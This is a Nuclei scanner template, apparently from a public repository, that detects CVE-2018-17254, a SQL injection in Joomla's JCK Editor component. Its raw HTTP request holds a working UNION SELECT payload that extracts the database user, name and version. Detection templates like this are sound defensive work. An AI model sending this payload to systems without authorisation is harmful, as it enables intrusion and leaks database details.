nuclei-templates/cves/2018/CVE-2018-17254.yaml

30 lines
1019 B
YAML
Raw Normal View History

id: CVE-2018-17254
info:
2021-06-18 11:28:27 +00:00
name: Joomla JCK Editor SQL Injection
author: Suman_Kar
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
severity: critical
tags: joomla,sqli,cve,cve2018
2021-08-29 09:14:12 +00:00
reference:
2021-08-09 13:35:43 +00:00
- http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html
- https://www.exploit-db.com/exploits/45423/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-17254
cwe-id: CWE-89
requests:
- raw:
- |
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
matchers:
- type: word
part: body
words:
- "nuclei-template"